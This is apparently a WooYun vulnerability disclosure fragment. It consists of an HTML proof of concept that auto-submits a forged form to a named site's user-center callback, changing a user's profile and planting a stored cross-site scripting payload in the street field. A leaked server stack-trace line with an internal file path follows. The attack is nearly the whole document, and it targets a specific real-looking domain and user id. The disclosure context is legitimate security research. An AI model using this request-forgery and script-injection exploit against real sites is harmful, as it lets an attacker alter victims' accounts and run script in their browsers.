WooYun.org

<form action="http://app.junph.com/CallBack/UserCenterCallBack.ashx" method="post">
<input type="test" name="type" value="edit"/>
<input type="test" name="userName" value="wooyun"/>
<input type="test" name="provice" value="%25E5%25AE%2589%25E5%25BE%25BD"/>
<input type="test" name="city" value="%25E5%25B7%25A2%25E6%25B9%2596"/>
<input type="test" name="street" value="%3cscript%3ealert(%2fxss%2f)%3c%2fscript%3e"/>
<input type="test" name="zip" value="529600"/>
<input type="test" name="moblie" value="12345678911"/>
<input type="test" name="tel" value=""/>
<input type="test" name="def" value="true"/>
<input type="test" name="email" value="[email protected]"/>
<input type="test" name="id" value="90383"/>
<script type="text/javascript">
 document.forms[0].submit();
</script>
</form>

ERP.UI.WEB.APP.Shopping.OrderDetail.Page_Load(Object sender, EventArgs e) in F:\jobs\TFS_workspace\TxErp2\TxErp\ERP.UI.WEB.APP\Shopping\OrderDetail.aspx.cs